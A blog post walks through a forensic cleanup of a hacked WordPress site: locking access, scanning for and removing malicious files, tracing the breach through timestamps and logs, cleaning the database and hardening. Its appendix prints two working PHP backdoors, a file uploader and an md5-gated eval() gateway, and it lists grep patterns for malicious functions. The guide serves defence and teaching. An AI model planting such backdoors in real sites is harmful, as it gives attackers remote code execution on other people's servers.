A Forensic Guide to WordPress Hack Cleanup
Categories: architecture
So you’ve been hacked, now what??
In my last post on WordPress security, “How Secure is WordPress“, I suggested hiring a professional ASAP when you’ve been hacked. I’m sticking with that advice — especially if your site is important to your business, better to let someone that has experience cleaning up these kind of messes take care of it and take care of it quickly. There’s many professional options out there that are reasonably priced: Sucuri, WP Security Lock and Unhack.us are names you see recommended often.
In this post I’d like to dive into my own cleanup process in hopes that the methodology is helpful. It’s not going to be as quick or clean as hiring someone else, but there’s a lot of reasons you might want to do-it-yourself here. Maybe your site doesn’t have the resources to hire someone to do the cleanup? Or maybe you want to just see how it’s done? After all what fun is it to hire someone else to do all the work? (Warning: fun level may vary and is not guaranteed).
There are a lot of post-hack guides out there. There’s the Google Webmasters hacked site guide, which is pretty good (though obviously not WordPress-specific). Plus there’s the official WordPress post-hack FAQ. Many of these guides have great info — but some are out-of-date, or focus on only one part of what is a multi-step process, or take a “nuke it from orbit” approach. While nuking it from orbit is indeed the only way to be sure; if you’re worried about losing data, or don’t know exactly when the hack happened, or don’t have a good backup to restore on top of the smoldering rubble (yikes!) then a more forensic approach may work best.
WordPress Comprehensive Hack Cleanup List
1. Shut down site access.
2. Find the compromised files.
3. Find when & how you were compromised.
4. Remove the compromised files.
5. Restore clean versions of files.
6. Scan and restore database.
7. Reset keys and user passwords.
8. Harden site.
9. Re-launch site.
10. Keep an eye on things.
Before we get started on the individual steps, a few things to keep in mind.
I find it helpful to remind myself that the site I’m working on was probably hacked as a part of an automated process. Unless you’re running a really big site or are particularly unlucky, the hackers who messed up your site came across it as a result of scanning thousands and thousands of sites for a particular attack method.
You care about your site, they don’t. By that I mean they don’t care what the content is, they don’t care to drill deeply down into your site and understand what’s going on, they just want to achieve whatever scheme they are working on: distributing malware, stealing credit cards, hiding links to other sites for SEO purposes, sending spam, etc. Their approach is a broad shotgun method — hack as many sites as they can to make some money, promote their political agenda, just for the lulz, etc.
Also, while the malicious code is frequently very clever, it’s also frequently very sloppy, and rarely tailored to any particular site. So when you’re scratching your head asking yourself, “what were they thinking??” — remember that the answer is that they weren’t really thinking about your site at all in particular.
Finally remember this is a very quickly changing area. Hacks that work today may not work tomorrow, and the tools change and adapt to those changes as well. The general process that I’m describing will continue to work, but the tools will change. Who has the best scanner or the most effective firewall may change next week, but the fundamental basics like good passwords and file permissions don’t change much at all.
Ok, on with the cleanup steps!
Step 1. Shut down site access.
However they got in, the first step should be to keep them from doing any more damage. Can your site be down for a day or two while you go through this cleaning process? If so then you may want to do the cleanup right on your live site. Put up a temporary “site down for maintenance” message up and you can start through the live site right away ideally.
If you can’t have that kind of downtime, then move the compromised site to an offline area or temporary URL and restore your live site from the most recent backup you have before it was compromised and update everything on that version. Until you’ve done your full investigation and whatever hardening you may do later that restored live version is a risk, so if you have the time you could do hardening on that temporary restored version as well so you don’t end up with two hacked sites.
If you’re working on either the live site or a temporary URL, lock down access to the site for anyone other than you. If you’re on apache that could be as simple as a global ban in the top-level .htaccess file, e.g.:
1 2 3 4 5 |
<Limit GET POST PUT> order deny,allow deny from all allow from your.ip.here </Limit> |
I also recommend pausing your WordPress scheduled tasks (cron jobs) if you are working this way, so in wp-config.php put this:
1 |
define('DISABLE_WP_CRON', 'true'); |
Don’t forget to re-enable cron when you’re all done or you’ll get some pretty weird behavior!
These two methods should stop anyone from running the malicious code. Well, other than yourself…
This is also a good time to back up your site as-is; files & database! This might seem like a weird thing to do — since why would you want a copy of what’s been hacked, but if scanning or cleaning go wrong you may want to start over at this point.
Step 2. Find the compromised files.
Now it gets harder, finding all the files that have been compromised. This is critical since if you don’t get them all your site might get re-hacked even if you update everything on the site to the latest versions.
When they hacked your site, they probably dropped one or more malicious scripts and / or modified some existing files. The code they dropped could be anything from a tiny script that when remotely called then downloads something else, or it could be a full PHP backdoor allowing a remote user to do pretty much anything they want from a full user interface. Curious what a backdoor looks like and how it works? Check out the appendix of this article.
The automated way (using scanning plugins).
Do you use version control? If yes you may already know what the compromised files are. A simple “git status” from the command line will of course show you what files have been changed — and assuming you haven’t checked in any malicious code then you’ll see all the candidates right away. You should still do a scan of all files just in case you did check in malicious code and not realize it, or the code is under a git ignored directory. Version control gives you a big leg up here, but not being comprehensive is how you get re-hacked.
There are a lot of security plugins out there, and they all take slightly different approaches. The two important features a plugin can have for finding the malicious files are:
a. Verifying installed files (core, and ideally even the plugins and themes) using checksums against a known good version.
b. Scanning all the files from the server side, NOT just the public-facing website.
Verifying core (A) is pretty easy, after all the WordPress.org API provides a list of files and their checksums. If you use wp-cli there’s even a command to check:
1 |
$ wp core verify-checksums |
and that will spit out any files that don’t match the core distribution (Danny van Kooten’s article about that here). Many other plugins do the same kind of validation. But that’s just core… What if your malicious files sit outside core in your plugins, themes, or as a PHP file alone outside of WordPress?
Wordfence is the only plugin I know of currently that fulfills both A & B above (there may be others as well, let me know if you know of one!). It can both scan every file on the server site against known malware signatures as well as verify both your core, plugins & themes against what’s listed on wordpress.org. Here’s what the output looks like:
An important caveat is that it can only scan plugins & themes listed on WordPress.org. If you’ve got a paid plugin or theme (or really anything you installed from outside the wordpress.org repository) then this scan won’t be able to check it for validity. A WordPress ecosystem where all plugins & themes were signed and then immediately verifiable no matter the source (like package managers such as yum/rpm) would be great, but we are seemingly still pretty far from that at the moment.
Don’t assume that because a plugin is a premium plugin that it is either safer or less of a target. As an example, I recently saw malware aimed at Gravity Forms (a premium forms plugin) where the first thing the malware did when run was replace part of Gravity Forms with a compromised version that would allow arbitrary uploads. Since it’s a premium plugin Wordfence’s validity check couldn’t detect that change, and as long as the compromiser code existed on the server (which existed outside of WordPress) it could continue to re-compromise the Gravity Forms file even if Gravity Forms was updated.
Validity checks are important, but ultimately B (file scanning) is the more important step of the two. The reason is because if the scan found everything malicious it will also then implicitly tell you what files would not verify properly. Because no scanner is perfect A can certainly complement B in coverage, but B is ultimately more critical, especially considering many hacks are totally new files, not just modifications of existing files.
VaultPress for example doesn’t verify file checksums, but it seems to do a good job of B, even beyond just scanning for malicious code. Here’s an example of a VaultPress scan:
The VaultPress scanner found the malicious code no problem, but also importantly pointed out a possible issue with TimThumb. TimThumb is a library that is no longer supported and had a history of a serious security issue, so running any version of it is a security risk (though running an older version with known exploits is a much much bigger risk).
This is great because while it’s not saying TimThumb was how the site was exploited, or even that TimThumb is exploitable, but that it is a security risk that needs to be addressed. This is ideal behavior as far as I’m concerned, but VaultPress comes with a price tag of $29/site/mo. (which includes an Akismet license and the VaultPress backup service itself). This could be a great scanning solution if you already have it, or are looking for that kind of backup service, but not something you’d want to install just to do a scan.
The exploit scanner plugin is another useful tool if you’re looking for something that is a little less automated. It can do A (though it can only verify core) and B, though what it reports for the scan in B is mostly going to be false positives because it looks for “suspicious” code, which in many cases is just normal use of functions like base64_decode() or eval().
At the time of writing this the exploit scanner plugin is also missing the latest WP core version signatures, which makes it less useful. That plus the amount of false positives is probably the reason for the low star rating on wordpress.org, but I have definitely found it to be a useful plugin when I know there is malware around but other methods aren’t finding it because it doesn’t match any known signature (or Wordfence is a prohibited plugin). The “high sensitivity” setting for the scan on Wordfence is similar in method, though not quite as broad (for better & worse). Especially if you have already installed Wordfence I would try high sensitivity there before installing yet another plugin.
The manual way (using command-line).
Scanning through all your files manually for possible malicious code is tough, as there are a huge number of ways that malicious code can be hidden. A good rundown of different manual searches you can do by Greg Freeman here. Let’s recap the basics of that kind of searching here.
Scan for recently changed files. For example to review all the PHP files changed in the last week:
1 |
$ find . -mtime -7 -name '*.php*' |
The “*.php*” would also find cases of endings like .php5 that could possibly be executed as well. It doesn’t have to be just PHP files that are compromised, the malicious code could be injected into any file, even image files (it’s just harder to get your code to run that way). So you should also look through everything (drop the -name argument). I also check -ctime as well as -mtime. The “m” option means the file has been changed, “c” means the files meta-information (inode) has changed, which could indicate a change in file permissions.
Especially if you’ve updated your site recently that find command could lead to a whole lot of results! Time to start grepping through them if you don’t see anything obviously unexpected just from the file lists. This command takes our file list from the step above and searches through all of them for a bunch of commonly used commands in malicious code:
1 |
$ find . -mtime -7 -name '*.php*' | xargs grep -iP "(exec|system|gzinflate|md5|eval|base64_decode)\s*\(" |
Make sure you set your time window broad enough! 7 days might not be long enough. This can be a lot of work, and even after spending a bunch of time carefully grepping through files it’s possible you might not get it all. This is why I actually use both methods: scan with Wordfence for what it thinks are malicious files and then also do some manual grepping myself to see if perhaps there was something Wordfence missed.
Step 3. Find when & how you were compromised.
Ok, so you’ve now found the compromised files. What do these files do exactly? If you used a scanner that told you what the code was (like the example above from VaultPress) then you already have a pretty good idea what these files might do. If you found it by hand or the scanner didn’t say exactly what it does then it’s time to dive into the code a bit.
My recommendation is to not dive too deep! Even after de-obfuscating and unpacking the code, it is not always clear what the code is trying to do. Don’t forget these hacks start out automated, and the code might not even work at all. Also it should go without saying, but DON’T RUN THE CODE ON YOUR SERVER!
If you really want to run it, setup a virtual machine with restricted access. For this article I setup an AWS micro instance with strong firewall rules to run the dangerous code on after I had figured out what it did.
I like unphp.net for code de-obfuscation. I have also used Sucuri’s DDecode, which can be better if there are multiple layers of obfuscation. Hopefully putting your code into one of those two will give you an idea of what it does. If you can’t figure out what it does, well… that’s ok… Rest assured it probably isn’t anything good!
Bad news though, just because you found the malicious code and maybe what it does, that doesn’t necessarily tell you much about how you were hacked in the first place. It also doesn’t tell you what malicious code that has been on your server but may now be gone! It’s quite common that hackers will drop a full-featured backdoor and then use that backdoor to upload more files for whatever they are trying to accomplish on your site, but then go ahead and delete the backdoor after, since the full backdoor is easier to detect. For example if they are aiming to get into your checkout process they might use the backdoor to edit your checkout templates to mail themselves your customer data, but then delete the backdoor so you don’t notice you’ve been hacked. They sure aren’t cleaning up after themselves to be courteous!
Ok, so let’s get to the how & when. Go back to that compromised file and look at the timestamps on the file. Notice the plural on “timestamps”! As mentioned back when we were talking about find commands, in Unix there is both a “modify” date and a “change” date. Normally the ls command returns “modify” (actual file contents have changed), not “change” (meta information like permissions have changed). The case in which these things are not the same and is relevant to our investigation is when a hacker uploads a .zip file and then extracts its contents. So upload a zip file of a PHP backdoor and unzip it and the timestamp you see with ls -l is the original date of the file in the archive, not the upload date. The extraction date would be available as the “change” time however. the “stat” command gives us that data:
1 2 3 4 5 6 7 |
$ ls -l yuck.php Mar 5 2013 yuck.php $ stat yuck.php File: ‘yuck.php’ Modify: 2013-03-05 07:57:06.000000000 +0000 Change: 2015-05-28 15:31:22.496162407 +0000 |
So when we start grepping our access logs looking for when this file was created from a web request we should grep for 2015-05-28!
$ grep 28/May/2015:15:31 access_log
172.16.0.59 – – [28/May/2015:15:31:04 +0000] “POST /wp-content/uploads/1_upload.php HTTP/1.1” 200 – “” “Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36”
If we find this we are really on their tail now. It looks like they managed to get a simple uploader script under the uploads directory and then used that to upload our “yuck.php” malware file.
Now just start grepping for that IP and you will hopefully be able to track back the request that they used to inject that uploader as well! That should be the initial breach. It might be a call to an out-of-date plugin with a major security hole, or a script completely outside of WordPress you forgot you had installed. If you’re not finding anything, try looking further back in your access logs (you might have been compromised some time ago, even many months), or it might be that the initial compromise came from a nearby IP but not quite the exact same one, in which case you can try grepping for just the start of the IP or looking up the full ranges available to that particular ISP.
Hopefully that all works and you find the smoking gun of when you were compromised. But maybe you don’t! I would say about 25% of the time I’m completely unable to find the initial point of attack in log files. Maybe the log files didn’t go back far enough, or maybe they distributed or otherwise hid their attack too well for me to find it. In these cases taking your best guess at what the point of attack was is all you can do. I find the best way to do that is to look at what exploits are known for the versions of software you are running. The WPScan Vulnerability Database is a good place to get that data, and I like Glen Scott’s Plugin Security Scanner which uses the WPScan data to tell you what in your WordPress install has known vulnerabilities. If you find a plugin that you have installed that has a remote code execution or arbitrary file upload hole, then that’s a good culprit, just look for something that matches the nature of your attack.
You can also try searching the exploit-db.com database for any plugin or external application you have available under your WordPress directory that you might suspect as the culprit. Just because you run WordPress it doesn’t mean your site was hacked via WordPress, even if they do end up defacing or otherwise mucking with your WordPress installation. Have an old copy of phpBB you forgot to delete running? phpMyAdmin? Any of those might have been the way in.
Finally no vulnerability database discussion would be complete without mentioning CVE, the most comprehensive vulnerabilities index out there. I like the CVE details site which is a (somewhat) user-friendly way to search all the CVE vulnerabilities out there. It even includes the data from the exploit-db database.
Step 4. Remove the compromised files.
This part is self-explanatory. Get rid of it, and don’t just move it out of your web directory, get it off your server. Print it out, stomp on it, set it on fire.
Step 5. Restore clean versions of files.
If your scan found modified files then now is the time to restore a known clean version of that file. If it was within a plugin or theme I recommend re-installing the entire plugin/theme. The Sucuri Scanner the ability to bulk re-install your non-premium plugins under the “Post-Hack” area. If you’re restoring from your own backups be wary. Just because you only saw the effect of the hack last week doesn’t mean that a hacked version of one of your files hasn’t been sitting around for a year.
Step 6. Scan and restore database.
We haven’t talked about the database yet, but certainly in some hacks (like some defacements or adding rogue admin users) you won’t see a file, only an entry in the database.
First, review your users and make sure there are none that shouldn’t be there. If you find any malicious users make sure check if they’ve published any content and clean that all up if so.
Rogue content in your database is a good news / bad news situation. The good news is that it’s most likely only bad content in the database advertising or linking to something that is spammy, not bad code or attacks on things like your checkout process, etc. The bad news is that because it is frequently just content it can be hard to find. Tools like Wordfence and Exploit Scanner do search through the database as well as files for malicious content, but things like defacements or spam links are more likely to be found by users unfortunately.
Maybe you already saw or got reports of bad / defaced content. Maybe Google Search Console (Webmaster Tools) told you about it. In any case if you’ve got the HTML you’re looking for searching the database using whatever database tool you have at your disposal (phpMyAdmin, Adminer plugin, etc.) should be pretty straightforward. If phpMyAdmin is not something managed by your hosting provider I do not recommend installing it as it may cause security issues down the road. Adminer is a phpMyAdmin-style tool that can work inside WordPress and use WordPress’ authentication and update system to stay safer (though still you should remove it after cleanup if you have no other use for it).
Frequently malicious content is hidden behind iframes or similar methods, doing a REGEX search in mysql is the equivalent of our manual find searches before, it can find things that the scanners might have missed but is a lot of work and full of false-positives. Here’s how I’d search the whole database via phpMyAdmin’s global database search:
So that breaks down to individual searches of every column in a table like this:
1 |
SELECT * FROM `yrdatabase`.`wp_options` WHERE (CONVERT(`option_id` USING utf8) REGEXP '(<iframe|<\\?(php)?|<noscript|display:none)' OR CONVERT(`option_name` USING utf8) REGEXP '(<iframe|<\\?(php)?|<noscript|display:none)' OR CONVERT(`option_value` USING utf8) REGEXP '(<iframe|<\\?(php)?|<noscript|display:none)' OR CONVERT(`autoload` USING utf8) REGEXP '(<iframe|<\\?(php)?|<noscript|display:none)') |
Once you find the malicious content you can edit the data in the same tool. The only exception to this is if it is stored as serialized data. For example the wp_options table is a popular place where bad content has frequently been stored in the past, and that data can be serialized (which looks like this):
1 |
a:154:{s:18:"woo_alt_stylesheet";s:11:"default.css";s:8:"woo_logo";s:71:"https://www.blah.com/wp-content/uploads/2012/06/.... |
That means if there’s data stored like that and you edit it directly it’ll break the data structure. For global search & replaces that include serialized data I like the wordpress db search replace tool from interconnectit since it handles that data without breaking stuff. If you use that tool make sure to delete it when you’re done!! I usually rename it right after I unzip it just in case, otherwise you’ve just left a new backdoor!
Step 7. Reset keys and user passwords.
Now that we think we’ve gotten the crud out, it’s time to make sure they don’t get back in.
Time for some password resetting. I know it’s annoying and can break things and upset users, but it’s important!
a. Reset the WordPress salts in the wp-config.php. This will also log you out. Many plugins offer this functionality (including iThemes Security and Sucuri), also you can do it manually and get a new block of secret keys from WordPress.org directly.
b. Change any other passwords that might have been exposed: ftp user password, shell account, email, database, third party login, etc. Remember, they had access to all your web server user-accessible files, so if you have a password or key in a config file they could now have it. If that web server user could read it, they might have found it.
c. Make your users reset their passwords. Don’t ask them to do it, you have to do it for them, otherwise many people won’t bother to change theirs which might let the hackers right back in. The Sucuri plugin among others offers this functionality in bulk, or if you have a small number of users you can just do it manually.
Step 8. Harden site.
Hardening your site is a full guide all by itself, but let’s hit some basics:
a. Setup a security plugin. I prefer iThemes Security for hardening, which does all of the other things on this list.
b. Enable brute force login protection and/or move login URL away from /wp-admin to something of your choosing.
c. Enable strong passwords (minimally for admins).
d. Don’t have an admin user or userid 1.
e. Disable PHP execution under the uploads directory.
There’s more too, but those are in my opinion the most critical. My iThemes Security configuration generally ends up up looking like every high & medium item turned on excluding away mode, renaming the database prefix, scheduled backups (since those are done elsewhere), and maybe or maybe not two-factor-auth.
You don’t have to hit every single item in the iThemes security dashboard list, but all the high & medium items aside from the ones I named above are good ideas without much risk of breaking things.
File Permissions!
This is the most basic part of Unix security, but sadly also the most common source of spreading problems. Whatever you can do to lock down file permissions can save you more consistently than almost anything else. Again this is something deserving of its own separate post, but the general best practices are:
-Don’t allow the web server user to write to anything it doesn’t need to!
-Especially don’t let that user write to .htaccess and wp-config.php.
-Nothing should be world-writable.
-If you have multiple sites on the same server, have them owned by different users and not able to write across sites. Otherwise if one site gets hacked that infection can easily spread to other sites on your same server.
The WordPress.org hardening FAQ is good for more info here.
Another small example. I worked on a site that had a vulnerable version of a upload manager, this hole allowed hackers to place whatever files they wanted on the server. But in this case the only area that was writable by the webserver user was wp-content/uploads, and since that area was also not allowed to run PHP under it that meant they couldn’t actually do any harm and all I had to do was delete some harmless junk files! These kind of safety guards don’t generally stop the point of initial breach (the bad plugin, etc.), they just contain or maybe even completely prevent damage.
Step 9. Re-launch site.
OK! Almost there. First make sure everything is up-to-date. You’ve hopefully got all the malicious code out, but the initial vulnerability you got hacked by might still be there if you haven’t already updated everything.
Turn stuff back on! Remove your .htaccess block, turn back on WP cron, notify your hosting provider if it was them who shut you down, etc. If you made it on any blacklists now is the time to ask for reviews from those as well. Here are the review instructions from Google.
Step 10. Keep an eye on things.
Ok, so what does that mean? For me that means turning on all the “nagging” notifications you can about site activity. Login history, file change history, access logs, error logs. Especially file change history is key here! iThemes Security offers this via a daily email notification with all the files that have been changed. This means a lot of lines in the email if you update stuff, but it also means if you missed something and you get re-hacked you’ll know right away, which may prevent your users from seeing the problem or you getting back on any blacklists.
Wrap-up.
I’ve sure mentioned a lot of plugins and tools in this article. I’m exactly happy about that, I’d like to be able to recommend just one plugin or tool that can do everything, but as you can tell it is a very broad subject. Here’s my opinions on which plugins I like best for what purpose:
– Best scanning tools: Wordfence
– Best post-hack tools: Sucuri Scanner
– Best hardening tools: iThemes Security
When it comes to security plugins not every host allows every plugin. For example WPEngine doesn’t allow Wordfence, so if you’re in a managed WordPress hosting environment you might find you’re unable to use some of these plugins. The good news is that if you’re in a managed WordPress host you’re less likely to be hacked in the first place.
If for some strange reason you are still reading at this point (thank you and congratulations!), this may all seem like a pretty huge amount of work. Sometimes it certainly can be a lot of time and energy, but with the right tools and some experience of what to look for it isn’t as bad as it all sounds and there are a lot of great tools to make your job easier. Still, this is clearly a time where an “ounce of prevention is worth a pound of cure” holds very true, so until the day you need this guide make sure to stay vigilant with prevention!
Appendix
What does a PHP backdoor look like, how does it work?
When I say backdoors can do “pretty much anything”, I mean run anything on your server that can be run by the webserver user. For example the common backdoor sometimes called “FilesMan” gives a point-and-hack interface.
Here’s what it looks like:
There is a surprising amount of functionality in this script. You could:
- upload any file you want.
- run a find command on the system to locate any configuration file (there’s a shortcut for that!).
- find user hashes and then auto-search external hash lookups! (thus easily crack lots of md5 hashed info).
- and many more…
Here’s the screen to mass update all files with the defacement message of your choice:
So the spelling might need some work… but the UI is pretty good, better than a lot of “legitimate” tools I’ve used!
FilesMan is one of the most feature-rich backdoors that might be dropped, but a backdoor could be as simple as a tiny file uploader:
1 2 3 4 5 6 |
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload ok :d !!!'; } else { echo 'Upload Fail !!!'; } } |
Or a trivial gateway to allow anyone with the right parameters passed to execute any arbitrary PHP code via eval():
1 |
if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '8a122d54ea4b01bb173517d98f00327e') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } |
There’s not much to either of those, but both are of course enough to allow further mischief.
There are infinite variety to these kind of hacks, but hopefully seeing the code un-obfuscated and in action will help you identify and understand what’s going on a little better.
Great points.
One thing I have seen previously after a cleanup is that spammy shop links were added to existing content going back years – these can be hard to spot. Especially so if you don’t take database backups to check against.
Luckily for us the links were added via the admin panel under a malicious user – so it was a simple case of reverting each post to the previous version. Unfortunately we had to go through each post by hand.
We now run https://wordpress.org/plugins/simple-history/ so that in the event of a user breach we can see which actions were taken. Unfortunately this does’t protect against manual database edits as they leave hardly any audit trail.
Thanks Richard! I agree the changes in the database itself can be really hard to root out, since really what’s to distinguish a spam link from a regular link other than the destination? Wordfence does search the database as well as the files, but it can be hard to catch that stuff. Front-end scanning for spamvertising via the premium version of Wordfence or the free Sucuri sitecheck tool (https://sitecheck.sucuri.net) can root out some of those links for people who weren’t as lucky as you to have it traced all to one user.
Manual database edits indeed are even harder to trace, but if someone is making a manual database edit they likely have some backdoor installed or via some kind of serious misconfiguration of database access, so hopefully once you root that out you can see any malicious user activity just via an audit plugin like you point out.